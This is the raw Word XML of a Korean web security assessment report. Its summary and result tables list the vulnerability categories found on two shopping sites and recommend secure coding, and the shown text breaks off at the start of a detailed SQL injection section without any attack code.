    <w:p w:rsidR="0005413B" w:rsidRPr="00C97C1E" w:rsidRDefault="0005413B" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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4" w:name="_Toc408957424"/>
      <w:bookmarkStart w:id="235" w:name="_Toc408957521"/>
      <w:bookmarkStart w:id="236" w:name="_Toc408957575"/>
      <w:bookmarkStart w:id="237" w:name="_Toc408957612"/>
      <w:bookmarkStart w:id="238" w:name="_Toc408957797"/>
      <w:bookmarkStart w:id="239" w:name="_Toc408957815"/>
      <w:bookmarkStart w:id="240" w:name="_Toc408957854"/>
      <w:bookmarkStart w:id="241" w:name="_Toc408958179"/>
      <w:bookmarkStart w:id="242" w:name="_Toc408958396"/>
      <w:bookmarkStart w:id="243" w:name="_Toc408958474"/>
      <w:bookmarkStart w:id="244" w:name="_Toc408960842"/>
      <w:bookmarkStart w:id="245" w:name="_Toc408996359"/>
      <w:bookmarkStart w:id="246" w:name="_Toc408999664"/>
      <w:bookmarkStart w:id="247" w:name="_Toc408999713"/>
      <w:bookmarkStart w:id="248" w:name="_Toc409005925"/>
      <w:bookmarkStart w:id="249" w:name="_Toc409006743"/>
      <w:bookmarkStart w:id="250" w:name="_Toc409006994"/>
      <w:bookmarkStart w:id="251" w:name="_Toc409009221"/>
      <w:bookmarkStart w:id="252" w:name="_Toc409009276"/>
      <w:bookmarkStart w:id="253" w:name="_Toc409009333"/>
      <w:bookmarkStart w:id="254" w:name="_Toc409009389"/>
      <w:bookmarkStart w:id="255" w:name="_Toc409009663"/>
      <w:bookmarkStart w:id="256" w:name="_Toc409012648"/>
      <w:bookmarkStart w:id="257" w:name="_Toc428014745"/>
      <w:bookmarkStart w:id="258" w:name="_Toc428825957"/>
      <w:bookmarkStart w:id="259" w:name="_Toc428826033"/>
      <w:bookmarkStart w:id="260" w:name="_Toc428831997"/>
      <w:bookmarkStart w:id="261" w:name="_Toc428832111"/>
      <w:bookmarkStart w:id="262" w:name="_Toc429863587"/>
      <w:bookmarkStart w:id="263" w:name="_Toc461106461"/>
      <w:bookmarkStart w:id="264" w:name="_Toc48720670"/>
      <w:bookmarkStart w:id="265" w:name="_Toc48721365"/>
      <w:bookmarkStart w:id="266" w:name="_Toc48895431"/>
      <w:bookmarkStart w:id="267" w:name="_Toc48903720"/>
      <w:bookmarkStart w:id="268" w:name="_Toc48908659"/>
      <w:bookmarkStart w:id="269" w:name="_Toc48908763"/>
      <w:bookmarkStart w:id="270" w:name="_Toc48908867"/>
      <w:bookmarkStart w:id="271" w:name="_Toc4890901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05413B" w:rsidRPr="00C97C1E" w:rsidRDefault="0005413B" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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72" w:name="_Toc408957425"/>
      <w:bookmarkStart w:id="273" w:name="_Toc408957522"/>
      <w:bookmarkStart w:id="274" w:name="_Toc408957576"/>
      <w:bookmarkStart w:id="275" w:name="_Toc408957613"/>
      <w:bookmarkStart w:id="276" w:name="_Toc408957798"/>
      <w:bookmarkStart w:id="277" w:name="_Toc408957816"/>
      <w:bookmarkStart w:id="278" w:name="_Toc408957855"/>
      <w:bookmarkStart w:id="279" w:name="_Toc408958180"/>
      <w:bookmarkStart w:id="280" w:name="_Toc408958397"/>
      <w:bookmarkStart w:id="281" w:name="_Toc408958475"/>
      <w:bookmarkStart w:id="282" w:name="_Toc408960843"/>
      <w:bookmarkStart w:id="283" w:name="_Toc408996360"/>
      <w:bookmarkStart w:id="284" w:name="_Toc408999665"/>
      <w:bookmarkStart w:id="285" w:name="_Toc408999714"/>
      <w:bookmarkStart w:id="286" w:name="_Toc409005926"/>
      <w:bookmarkStart w:id="287" w:name="_Toc409006744"/>
      <w:bookmarkStart w:id="288" w:name="_Toc409006995"/>
      <w:bookmarkStart w:id="289" w:name="_Toc409009222"/>
      <w:bookmarkStart w:id="290" w:name="_Toc409009277"/>
      <w:bookmarkStart w:id="291" w:name="_Toc409009334"/>
      <w:bookmarkStart w:id="292" w:name="_Toc409009390"/>
      <w:bookmarkStart w:id="293" w:name="_Toc409009664"/>
      <w:bookmarkStart w:id="294" w:name="_Toc409012649"/>
      <w:bookmarkStart w:id="295" w:name="_Toc428014746"/>
      <w:bookmarkStart w:id="296" w:name="_Toc428825958"/>
      <w:bookmarkStart w:id="297" w:name="_Toc428826034"/>
      <w:bookmarkStart w:id="298" w:name="_Toc428831998"/>
      <w:bookmarkStart w:id="299" w:name="_Toc428832112"/>
      <w:bookmarkStart w:id="300" w:name="_Toc429863588"/>
      <w:bookmarkStart w:id="301" w:name="_Toc461106462"/>
      <w:bookmarkStart w:id="302" w:name="_Toc48720671"/>
      <w:bookmarkStart w:id="303" w:name="_Toc48721366"/>
      <w:bookmarkStart w:id="304" w:name="_Toc48895432"/>
      <w:bookmarkStart w:id="305" w:name="_Toc48903721"/>
      <w:bookmarkStart w:id="306" w:name="_Toc48908660"/>
      <w:bookmarkStart w:id="307" w:name="_Toc48908764"/>
      <w:bookmarkStart w:id="308" w:name="_Toc48908868"/>
      <w:bookmarkStart w:id="309" w:name="_Toc48909019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05413B" w:rsidRPr="00A24C89" w:rsidRDefault="0005413B" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="310" w:name="_Toc48909020"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>총평 요약</w:t>
      </w:r>
      <w:bookmarkEnd w:id="310"/>
    </w:p>
    <w:p w:rsidR="008E529E" w:rsidRPr="00A24C89" w:rsidRDefault="00DE25A1" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab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</w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">코어몰과 아바타몰 </w:t>
      </w:r>
      <w:r w:rsidR="00882F34" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사이트</w:t>
      </w:r>
      <w:r w:rsidR="0005413B" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> 진단 결과 </w:t>
      </w:r>
      <w:r w:rsidR="00CA21D1" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코어몰은 1</w:t>
      </w:r>
      <w:r w:rsidR="00D61A5B">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00A37366" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개</w:t>
      </w:r>
      <w:r w:rsidR="00CA21D1" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00CA21D1" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">아바타몰은 </w:t>
      </w:r>
      <w:r w:rsidR="00D61A5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00CA21D1" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개의</w:t>
      </w:r>
      <w:r w:rsidR="0005413B" w:rsidRPr="00A24C89">
        <w:t xml:space="preserve"> 취약점이 </w:t>
      </w:r>
      <w:r w:rsidR="00331277" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>발견 되었으며, 불충분한 인증 및 인가</w:t>
      </w:r>
      <w:r w:rsidR="00CA21D1" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00331277" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
      <w:r w:rsidR="005D771C" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, 파일 업로드 </w:t>
      </w:r>
      <w:r w:rsidR="00331277" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등은 빠른 조치를 취할 것을 권고</w:t>
      </w:r>
      <w:r w:rsidR="009C4312" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함.</w:t>
      </w:r>
      <w:r w:rsidR="00331277" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 또한, </w:t>
      </w:r>
      <w:r w:rsidR="00DD74C4" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL 인젝션, </w:t>
      </w:r>
      <w:r w:rsidR="00331277" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">서버 정보노출, </w:t>
      </w:r>
      <w:r w:rsidR="00DD74C4" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">악성 콘텐츠, </w:t>
      </w:r>
      <w:r w:rsidR="00331277" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS, 약한 문자열 강도</w:t>
      </w:r>
      <w:r w:rsidR="00CA21D1" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00331277" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">자동화 공격, 데이터 평문 전송, 쿠키 변조, </w:t>
      </w:r>
      <w:r w:rsidR="00DD74C4" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">불출분한 </w:t>
      </w:r>
      <w:r w:rsidR="002D018B" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>세션</w:t>
      </w:r>
      <w:r w:rsidR="00DD74C4" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 관리 </w:t>
      </w:r>
      <w:r w:rsidR="00331277" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파라미터 변조</w:t>
      </w:r>
      <w:r w:rsidR="00CA21D1" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00331277" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">관리자 페이지 노출 등 취약점이 발견 </w:t>
      </w:r>
      <w:r w:rsidR="009C4312" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>됨</w:t>
      </w:r>
      <w:r w:rsidR="00CA21D1" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00592FCF" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>시큐어 코딩 등과 같은 보안 대책을 권고</w:t>
      </w:r>
      <w:r w:rsidR="009C4312" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5207" w:rsidRPr="00C97C1E" w:rsidRDefault="006F5207" w:rsidP="006F5207">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="1300"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pP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D52F09" w:rsidRPr="00C97C1E" w:rsidTr="006F5207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D52F09" w:rsidRPr="00C97C1E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D52F09" w:rsidRPr="00C97C1E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D52F09" w:rsidRPr="00C97C1E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D52F09" w:rsidRPr="00C97C1E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8064A2" w:themeFill="accent4"/>
          </w:tcPr>
          <w:p w:rsidR="00D52F09" w:rsidRPr="00C97C1E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버퍼 오버플로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LDAP 인젝션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SQL 인젝션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SSI 인젝션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6F5207" w:rsidP="00773B09">
            <w:pPr>
              <w:jc w:val="center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 인젝션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6F5207" w:rsidP="00773B09">
            <w:pPr>
              <w:jc w:val="center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6F5207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악성 콘텐츠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크로스사이트 스크립팅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AC1C0A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5A5428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크로스사이트 리퀘스트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34477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872DF7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34477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A10BAC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872DF7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D52F09" w:rsidRPr="00C97C1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A10BAC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D52F09" w:rsidRPr="00C97C1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A10BAC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데이터 평문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D52F09" w:rsidRPr="00C97C1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A24C89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A24C89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A24C89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A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00773B09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</w:tbl>
    <w:p w:rsidR="008E529E" w:rsidRPr="00A24C89" w:rsidRDefault="00A44A87" w:rsidP="00A44A87">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="311" w:name="_Toc48909110"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>&lt;표</w:t>
      </w:r>
      <w:r w:rsidR="00AE25BA" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ &lt;표1- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="006F5207" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">코어몰 </w:t>
      </w:r>
      <w:r w:rsidR="00582EE4" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>취약점 진단 결과</w:t>
      </w:r>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p w:rsidR="006F5207" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E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6F5207" w:rsidRPr="00C97C1E" w:rsidTr="006F5207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6F5207" w:rsidRPr="00C97C1E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lastRenderedPageBreak/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6F5207" w:rsidRPr="00C97C1E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6F5207" w:rsidRPr="00C97C1E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6F5207" w:rsidRPr="00C97C1E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8064A2" w:themeFill="accent4"/>
          </w:tcPr>
          <w:p w:rsidR="006F5207" w:rsidRPr="00C97C1E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C97C1E"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버퍼 오버플로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LDAP 인젝션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SQL 인젝션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SSI 인젝션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 인젝션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악성 콘텐츠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크로스사이트 스크립팅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크로스사이트 리퀘스트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872DF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872DF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872DF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872DF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A81C85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FF0000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>취약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872DF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872DF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데이터 평문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9B7B99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  <w:tr w:rsidR="006F5207" w:rsidRPr="00C97C1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A24C89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A24C89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A24C89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FF0000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89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양호</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006F5207" w:rsidRPr="00A24C89" w:rsidRDefault="006F5207" w:rsidP="006F5207">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="312" w:name="_Toc48909111"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;표2- </w:t>
      </w:r>
      <w:r w:rsidR="00872DF7" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00872DF7" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ &lt;표1- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00872DF7" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00872DF7" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00872DF7" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>아바타몰</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점 진단 결과</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312"/>
    </w:p>
    <w:p w:rsidR="008E529E" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00872DF7" w:rsidRPr="00C97C1E" w:rsidRDefault="00C97C1E" w:rsidP="00C97C1E">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="_Toc48909021"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E529E" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>상세 진단 결과</w:t>
      </w:r>
      <w:r w:rsidR="00872DF7" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(코어몰)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
    </w:p>
    <w:p w:rsidR="008E529E" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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14" w:name="_Toc408957616"/>
      <w:bookmarkStart w:id="315" w:name="_Toc408957801"/>
      <w:bookmarkStart w:id="316" w:name="_Toc408957819"/>
      <w:bookmarkStart w:id="317" w:name="_Toc408957858"/>
      <w:bookmarkStart w:id="318" w:name="_Toc408958183"/>
      <w:bookmarkStart w:id="319" w:name="_Toc408958400"/>
      <w:bookmarkStart w:id="320" w:name="_Toc408958478"/>
      <w:bookmarkStart w:id="321" w:name="_Toc408960846"/>
      <w:bookmarkStart w:id="322" w:name="_Toc408996363"/>
      <w:bookmarkStart w:id="323" w:name="_Toc408999668"/>
      <w:bookmarkStart w:id="324" w:name="_Toc408999717"/>
      <w:bookmarkStart w:id="325" w:name="_Toc409005929"/>
      <w:bookmarkStart w:id="326" w:name="_Toc409006747"/>
      <w:bookmarkStart w:id="327" w:name="_Toc409006998"/>
      <w:bookmarkStart w:id="328" w:name="_Toc409009225"/>
      <w:bookmarkStart w:id="329" w:name="_Toc409009280"/>
      <w:bookmarkStart w:id="330" w:name="_Toc409009337"/>
      <w:bookmarkStart w:id="331" w:name="_Toc409009393"/>
      <w:bookmarkStart w:id="332" w:name="_Toc409009667"/>
      <w:bookmarkStart w:id="333" w:name="_Toc409012652"/>
      <w:bookmarkStart w:id="334" w:name="_Toc428014749"/>
      <w:bookmarkStart w:id="335" w:name="_Toc428825961"/>
      <w:bookmarkStart w:id="336" w:name="_Toc428826037"/>
      <w:bookmarkStart w:id="337" w:name="_Toc428832001"/>
      <w:bookmarkStart w:id="338" w:name="_Toc428832115"/>
      <w:bookmarkStart w:id="339" w:name="_Toc429863591"/>
      <w:bookmarkStart w:id="340" w:name="_Toc461106465"/>
      <w:bookmarkStart w:id="341" w:name="_Toc48720674"/>
      <w:bookmarkStart w:id="342" w:name="_Toc48721369"/>
      <w:bookmarkStart w:id="343" w:name="_Toc48895435"/>
      <w:bookmarkStart w:id="344" w:name="_Toc48903724"/>
      <w:bookmarkStart w:id="345" w:name="_Toc48908663"/>
      <w:bookmarkStart w:id="346" w:name="_Toc48908767"/>
      <w:bookmarkStart w:id="347" w:name="_Toc48908871"/>
      <w:bookmarkStart w:id="348" w:name="_Toc48909022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8E529E" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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49" w:name="_Toc408957617"/>
      <w:bookmarkStart w:id="350" w:name="_Toc408957802"/>
      <w:bookmarkStart w:id="351" w:name="_Toc408957820"/>
      <w:bookmarkStart w:id="352" w:name="_Toc408957859"/>
      <w:bookmarkStart w:id="353" w:name="_Toc408958184"/>
      <w:bookmarkStart w:id="354" w:name="_Toc408958401"/>
      <w:bookmarkStart w:id="355" w:name="_Toc408958479"/>
      <w:bookmarkStart w:id="356" w:name="_Toc408960847"/>
      <w:bookmarkStart w:id="357" w:name="_Toc408996364"/>
      <w:bookmarkStart w:id="358" w:name="_Toc408999669"/>
      <w:bookmarkStart w:id="359" w:name="_Toc408999718"/>
      <w:bookmarkStart w:id="360" w:name="_Toc409005930"/>
      <w:bookmarkStart w:id="361" w:name="_Toc409006748"/>
      <w:bookmarkStart w:id="362" w:name="_Toc409006999"/>
      <w:bookmarkStart w:id="363" w:name="_Toc409009226"/>
      <w:bookmarkStart w:id="364" w:name="_Toc409009281"/>
      <w:bookmarkStart w:id="365" w:name="_Toc409009338"/>
      <w:bookmarkStart w:id="366" w:name="_Toc409009394"/>
      <w:bookmarkStart w:id="367" w:name="_Toc409009668"/>
      <w:bookmarkStart w:id="368" w:name="_Toc409012653"/>
      <w:bookmarkStart w:id="369" w:name="_Toc428014750"/>
      <w:bookmarkStart w:id="370" w:name="_Toc428825962"/>
      <w:bookmarkStart w:id="371" w:name="_Toc428826038"/>
      <w:bookmarkStart w:id="372" w:name="_Toc428832002"/>
      <w:bookmarkStart w:id="373" w:name="_Toc428832116"/>
      <w:bookmarkStart w:id="374" w:name="_Toc429863592"/>
      <w:bookmarkStart w:id="375" w:name="_Toc461106466"/>
      <w:bookmarkStart w:id="376" w:name="_Toc48720675"/>
      <w:bookmarkStart w:id="377" w:name="_Toc48721370"/>
      <w:bookmarkStart w:id="378" w:name="_Toc48895436"/>
      <w:bookmarkStart w:id="379" w:name="_Toc48903725"/>
      <w:bookmarkStart w:id="380" w:name="_Toc48908664"/>
      <w:bookmarkStart w:id="381" w:name="_Toc48908768"/>
      <w:bookmarkStart w:id="382" w:name="_Toc48908872"/>
      <w:bookmarkStart w:id="383" w:name="_Toc48909023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8E529E" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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84" w:name="_Toc408957618"/>
      <w:bookmarkStart w:id="385" w:name="_Toc408957803"/>
      <w:bookmarkStart w:id="386" w:name="_Toc408957821"/>
      <w:bookmarkStart w:id="387" w:name="_Toc408957860"/>
      <w:bookmarkStart w:id="388" w:name="_Toc408958185"/>
      <w:bookmarkStart w:id="389" w:name="_Toc408958402"/>
      <w:bookmarkStart w:id="390" w:name="_Toc408958480"/>
      <w:bookmarkStart w:id="391" w:name="_Toc408960848"/>
      <w:bookmarkStart w:id="392" w:name="_Toc408996365"/>
      <w:bookmarkStart w:id="393" w:name="_Toc408999670"/>
      <w:bookmarkStart w:id="394" w:name="_Toc408999719"/>
      <w:bookmarkStart w:id="395" w:name="_Toc409005931"/>
      <w:bookmarkStart w:id="396" w:name="_Toc409006749"/>
      <w:bookmarkStart w:id="397" w:name="_Toc409007000"/>
      <w:bookmarkStart w:id="398" w:name="_Toc409009227"/>
      <w:bookmarkStart w:id="399" w:name="_Toc409009282"/>
      <w:bookmarkStart w:id="400" w:name="_Toc409009339"/>
      <w:bookmarkStart w:id="401" w:name="_Toc409009395"/>
      <w:bookmarkStart w:id="402" w:name="_Toc409009669"/>
      <w:bookmarkStart w:id="403" w:name="_Toc409012654"/>
      <w:bookmarkStart w:id="404" w:name="_Toc428014751"/>
      <w:bookmarkStart w:id="405" w:name="_Toc428825963"/>
      <w:bookmarkStart w:id="406" w:name="_Toc428826039"/>
      <w:bookmarkStart w:id="407" w:name="_Toc428832003"/>
      <w:bookmarkStart w:id="408" w:name="_Toc428832117"/>
      <w:bookmarkStart w:id="409" w:name="_Toc429863593"/>
      <w:bookmarkStart w:id="410" w:name="_Toc461106467"/>
      <w:bookmarkStart w:id="411" w:name="_Toc48720676"/>
      <w:bookmarkStart w:id="412" w:name="_Toc48721371"/>
      <w:bookmarkStart w:id="413" w:name="_Toc48895437"/>
      <w:bookmarkStart w:id="414" w:name="_Toc48903726"/>
      <w:bookmarkStart w:id="415" w:name="_Toc48908665"/>
      <w:bookmarkStart w:id="416" w:name="_Toc48908769"/>
      <w:bookmarkStart w:id="417" w:name="_Toc48908873"/>
      <w:bookmarkStart w:id="418" w:name="_Toc48909024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9D19C1" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="_Toc48909025"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>SQL 인젝션</w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
    </w:p>
    <w:p w:rsidR="009D19C1" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1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9D19C1" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1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9D19C1" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1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9D19C1" w:rsidRPr="00A24C89" w:rsidRDefault="009D19C1" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
